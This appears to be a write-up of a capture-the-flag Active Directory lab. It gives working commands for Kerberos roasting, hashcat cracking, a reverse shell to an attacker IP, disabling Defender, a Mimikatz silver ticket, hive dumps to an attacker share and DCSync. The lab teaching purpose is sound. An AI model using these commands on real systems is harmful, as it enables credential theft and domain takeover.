VL-Lustrous

Initial Reconnaissance

The first step in our penetration test was gathering information about the target system using an Nmap scan:

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-18 11:52:41Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped    syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-18T11:53:35+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60046/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
60047/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60086/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
60103/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Anonymous FTP Enumeration

The scan shows that the target is the domain controller LusDC.lustrous.vl for the lustrous.vl domain (build 20348, i.e. Windows Server 2022), with IIS, WinRM (5985) and RDP exposed. It also revealed that anonymous FTP login is allowed, so that is where we started:

ftp 10.10.181.149

Potential User Accounts

The files on the FTP server gave us several usernames to work with:

ben.cox
rachel.parker
tony.ward
wayne.taylor

Kerberos User Enumeration

Next, we used Kerbrute to enumerate users in the Active Directory domain:

./kerbrute userenum -d lustrous.vl ~/Downloads/usernames.txt --dc 10.10.181.149

No Pre-Authentication Required

AS-REP Roasting Attack

Kerbrute reported that ben.cox does not require Kerberos pre-authentication and dumped his AS-REP hash, but in the AES256 form ($krb5asrep$18$...), for which hashcat has no mode. We therefore re-requested the AS-REP with Impacket's GetNPUsers, which asks the KDC for RC4 (etype 23) and prints a $krb5asrep$23$ hash that hashcat can crack:

impacket-GetNPUsers lustrous.vl/ -usersfile ~/Downloads/usernames.txt -dc-ip 10.10.181.149

Then we cracked the hash with hashcat (mode 18200, Kerberos 5 etype 23 AS-REP):

hashcat -m 18200 hash2020.txt /usr/share/wordlists/rockyou.txt

Cracked Hash
Successfully obtained credentials:

ben.cox : <PASS>

Password Spraying and User Enumeration

Whenever a password is recovered, spray it across the other known accounts as well; here the credentials turned out to be valid on both the DC and the member server.
Access to Both Machines
With a valid domain account we could list every user in the domain over SMB:

netexec smb 10.10.181.149 -u 'ben.cox' -p '<PASS>' --users

All Users in Domain
Complete list of domain users:

Administrator
Guest
krbtgt
Deborah.Harris
Duncan.Spencer
Brenda.Andrews
Rachel.Parker
Wayne.Taylor
Hugh.Wilkinson
Tracy.Roberts
Bradley.Hancock
Tony.Ward
Joanna.Hall
Marian.Elliott
Ben.Cox
Joanna.Harvey
Jeremy.Clark
Allan.Parker
Mitchell.Fuller
Colin.Dodd
Liam.Atkinson
Michelle.John
Iain.Evans
Donna.Collins
Cameron.Walsh
svc_web
svc_db

Service Account Enumeration and Attack

With ben.cox's credentials we asked the DC for accounts that have an SPN set and requested a service ticket for each (Kerberoasting). The ticket is encrypted with the service account's key, so it can be cracked offline:

impacket-GetUserSPNs lustrous.vl/ben.cox:<PASS> -dc-ip 10.10.172.117 -request

Service Account Hash
The returned $krb5tgs$23$ hash cracked with hashcat (mode 13100), giving the svc_web password:

svc_web : <PASS>
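The AS-REP and Kerberoast steps above both hinge on which encryption type the hash was returned with. The following is an added Python example (not part of the original writeup) that parses hashcat-format Kerberos hash lines as printed by Kerbrute, GetNPUsers and GetUserSPNs, extracts the principal and etype, and picks the hashcat mode, reporting AES AS-REP hashes as needing a re-request with RC4. The sample lines are constructed (fake hex); only the principal names come from this box.

```python
import re

# hashcat modes for the hash types the three tools emit. There is no hashcat
# mode for AES (etype 17/18) AS-REP hashes, which is why the $krb5asrep$18$
# hash from Kerbrute had to be re-requested as RC4 with GetNPUsers.
HASHCAT_MODES = {
    ("asrep", 23): 18200,  # Kerberos 5, etype 23, AS-REP
    ("tgs", 23): 13100,    # Kerberos 5, etype 23, TGS-REP
    ("tgs", 17): 19600,    # Kerberos 5, etype 17, TGS-REP
    ("tgs", 18): 19700,    # Kerberos 5, etype 18, TGS-REP
}

PREFIX_RE = re.compile(r"^\$krb5(?P<kind>asrep|tgs)\$(?P<etype>\d+)\$(?P<rest>.+)$")

# Constructed sample lines (hex payloads are fake), one per format variant.
SAMPLE_LINES = [
    "$krb5asrep$18$ben.cox@LUSTROUS.VL:00112233445566778899aabbccddeeff$0123456789abcdef",
    "$krb5asrep$23$ben.cox@LUSTROUS.VL:00112233445566778899aabbccddeeff$0123456789abcdef",
    "$krb5tgs$23$*svc_web$LUSTROUS.VL$lustrous.vl/svc_web*$00112233445566778899aabbccddeeff$0123456789abcdef",
    "$krb5tgs$18$svc_web$LUSTROUS.VL$*lustrous.vl/svc_web*$001122334455667788990011$0123456789abcdef",
]


def parse_kerberos_hash(line):
    """Describe one hashcat-format Kerberos hash line; None if it is not one."""
    m = PREFIX_RE.match(line.strip())
    if not m:
        return None
    kind, etype, rest = m["kind"], int(m["etype"]), m["rest"]
    if kind == "asrep":
        # $krb5asrep$<etype>$user@REALM:checksum$edata
        principal = rest.split(":", 1)[0]
    elif rest.startswith("*"):
        # RC4 TGS format: $krb5tgs$23$*user$REALM$spn*$checksum$edata
        user, realm, _spn = rest[1:].split("*", 1)[0].split("$", 2)
        principal = f"{user}@{realm}"
    else:
        # AES TGS format: $krb5tgs$17|18$user$REALM$*spn*$checksum$edata
        user, realm = rest.split("$", 2)[:2]
        principal = f"{user}@{realm}"
    return {"kind": kind, "etype": etype, "principal": principal,
            "mode": HASHCAT_MODES.get((kind, etype))}


def triage(lines):
    """Split hash lines into (crackable with hashcat, needs re-request)."""
    crackable, pending = [], []
    for line in lines:
        info = parse_kerberos_hash(line)
        if info is not None:
            (crackable if info["mode"] else pending).append(info)
    return crackable, pending


if __name__ == "__main__":
    ok, todo = triage(SAMPLE_LINES)
    for h in ok:
        print(f"hashcat -m {h['mode']}  # {h['kind']} etype {h['etype']} for {h['principal']}")
    for h in todo:
        print(f"no hashcat mode for {h['kind']} etype {h['etype']} ({h['principal']}); "
              "re-request with RC4, e.g. GetNPUsers")
```

Feed it the raw output files from Kerbrute and the Impacket scripts; anything that is not a hash line (banners, progress messages) is skipped, so the parser can run over unedited tool output.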

BloodHound Collection

With a second set of domain credentials we collected BloodHound data over LDAP, pointing netexec at the DC for DNS so that every host name resolves:

netexec ldap 10.10.172.117 -u 'svc_web' -p '<PASS>' --bloodhound --dns-server 10.10.172.117 -c ALL --dns-tcp

Lateral Movement to Member Server

From the BloodHound data we found that Ben.Cox has WinRM (PSRemote) access to the member server LusMS.lustrous.vl, which we confirmed:

netexec winrm 10.10.172.118 -u ben.cox -p '<PASS>'

WinRM Access

Privilege Escalation via Encrypted Credentials

On ben.cox's desktop we found admin.xml and pulled it back with the WinRM shell's download command:
Admin XML File

download admin.xml

The file is Export-Clixml output: a serialized PSCredential for LUSMS\Administrator whose password is a SecureString. Export-Clixml protects that SecureString with DPAPI under the key of the user who exported it (evidently ben.cox, since the import below succeeded), so it cannot be decrypted on our attacking box; it has to be unwrapped as ben.cox on LusMS itself. To get an interactive PowerShell session there, we used HoaxShell:

hoaxshell -s 10.8.5.195 -p 4444

In that session, from the Desktop directory, we imported the credential and unwrapped the SecureString:

$cred = Import-Clixml -Path .\admin.xml                                              # deserialize the PSCredential (DPAPI-decrypts the SecureString)
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($cred.Password)  # copy the plaintext into an unmanaged BSTR
$PlainPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)     # read it back as a .NET string
Write-Output "Decrypted password: $PlainPassword"

(Calling $cred.GetNetworkCredential().Password does the same in one step.)

This returned the local Administrator password for LusMS.lustrous.vl. We verified it over SMB as a local (non-domain) account:

netexec smb 10.10.172.118 -u Administrator -p '<PASS>' -d .

Admin Access on Member Server

Pivoting to Domain Controller

With the local Administrator password we opened an RDP session to LusMS:

xfreerdp /v:10.10.212.102 /u:Administrator /p:'<PASS>'

From LusMS we browsed to the IIS site on the DC (ports 80/443), which uses Windows authentication. Logging in as Ben.Cox showed notes belonging to the logged-in user, which suggested that other users' notes might hold something useful:
Port 443 on DC
Useful Information

Creating a Silver Ticket

The IIS site on the DC runs as svc_web, the account whose SPN we Kerberoasted, and we know that account's password. That is all a silver ticket needs: a service ticket for HTTP/LusDC.lustrous.vl encrypted with svc_web's key, claiming whatever identity we like. The web application trusts the ticket, so we could read other users' notes; we impersonated tony.ward.
First, via the RDP session, we disabled real-time monitoring on LusMS, uploaded Mimikatz and ran it as SYSTEM:
Mimikatz
We needed the domain SID and the RC4 (NT) hash of the svc_web account. lookupsid gives the SID and also lists each user's RID, which is where the /id:1114 for tony.ward comes from:

impacket-lookupsid lustrous.vl/ben.cox:'<PASS>'@10.10.246.101

Domain SID
Domain SID: S-1-5-21-2355092754-1584501958-1513963426
The RC4-HMAC Kerberos key is simply the NT hash of the password, i.e. MD4 over its UTF-16LE encoding. We computed it with an online tool; computing it locally is the better habit, since a service account password should never be pasted into a third-party site.
In Mimikatz, we forged the ticket for tony.ward (RID 1114) against the HTTP service on the DC and injected it into the current logon session (/ptt):

kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:LusDC.lustrous.vl /service:HTTP /rc4:<SVC_WEB_HASH> /user:tony.ward

Ticket Key
Because /ptt injects the ticket into the logon session Mimikatz runs in, the browser has to be started from that same session. We switched to a CMD prompt there and launched Edge with the DC on its Negotiate allow-list, so that it answers the site's Kerberos challenge with our forged ticket instead of prompting:

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" --auth-server-whitelist="LusDc.lustrous.vl" http://LusDc.lustrous.vl

Edge authenticated as tony.ward, and his notes contained his password:
Tony's Password

tony.ward : <PASS>

DCSync Attack via Backup Privileges

Tony.Ward is a member of Backup Operators. That group holds SeBackupPrivilege and SeRestorePrivilege, which let it read any file regardless of its ACL (ntds.dit included) and save registry hives, locally or through the remote registry service. We cannot WinRM in as Tony, so instead we used Impacket's reg.py over SMB/RPC to make the DC save its SAM, SYSTEM and SECURITY hives onto a share we control. The SECURITY hive holds the LSA secrets, among them the DC's own machine account password ($MACHINE.ACC), and a domain controller's machine account has the replication rights needed for DCSync.
First, we started an SMB server to receive the hives:

impacket-smbserver hello ./share -smb2support

Then we had the DC write the hives straight to that share (the DC connects back to us as its machine account, so the share must allow that):

reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SAM' -o '\\10.8.5.195\hello'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.195\hello'
reg.py lustrous.vl/tony.ward:<PASS>@10.10.246.101 save -keyName 'HKLM\SECURITY' -o '\\10.8.5.195\hello'

Back on our machine, secretsdump decrypted the hives offline (SYSTEM supplies the boot key needed for the other two):

secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local

Machine Account Hash
With the LusDC$ NT hash from the $MACHINE.ACC secret we authenticated as the DC's machine account and ran DCSync against the domain:

secretsdump.py 'LusDC$'@10.10.246.101 -hashes ':<HASH>'

This returned the domain Administrator's NT hash, which we used to pass-the-hash over WinRM to the DC and capture the flag.

https://api.vulnlab.com/api/v1/share?id=3e1b2cf9-e911-4b8c-a741-d4d862dba811